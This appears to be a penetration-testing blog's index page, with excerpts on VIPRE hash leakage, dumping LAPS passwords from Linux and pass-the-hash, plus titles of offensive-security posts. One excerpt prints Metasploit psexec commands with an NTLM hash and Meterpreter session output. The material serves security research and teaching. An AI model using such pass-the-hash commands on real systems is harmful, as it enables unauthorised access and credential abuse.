This post documents a security mis-configuation I observed in VIPRE Endpoint Security with Endpoint Discovery. A few years ago, I published a blog post titled The Dangers of Client Probing on Palo Alto Firewalls, which detailed how client probing feature on Palo Alto firewalls can leak service account password hashes. This issue is very similar…
Dumping LAPS Passwords from Linux
Following my previous posts on Managing Active Directory groups from Linux and Alternative ways to Pass the Hash (PtH), I want to cover ways to perform certain attacks or post-exploitation actions from Linux. I’ve found that there are two parallel ways to operate on an internal network, one being through a compromised (typically Windows) host,…
Alternative ways to Pass the Hash (PtH)
Do you remember the first time you passed the hash? It probably went a little something like this: msf > use exploit/windows/smb/psexec msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c SMBPass => e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c msf exploit(psexec) > exploit [*] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (192.168.57.133:443 -> 192.168.57.131:1045) If you are unfamiliar, that is the…
Categories
n00py Blog
- The Dangers of Endpoint Discovery in VIPRE Endpoint Security
- Dumping LAPS Passwords from Linux
- Alternative ways to Pass the Hash (PtH)
- Password Spraying Secure Logon for F5 Networks
- Extracting files from Burp Intruder Output
- Exploiting LDAP Server NULL Bind
- Managing Active Directory groups from Linux
- Zero day vulnerabilities in Determine Selectica Contract Lifecycle Management (SCLM) v5.4
- Password Spraying Dell SonicWALL Virtual Office
- Introducing Slackor, a Remote Access Tool Using Slack as a C2 Channel
Archives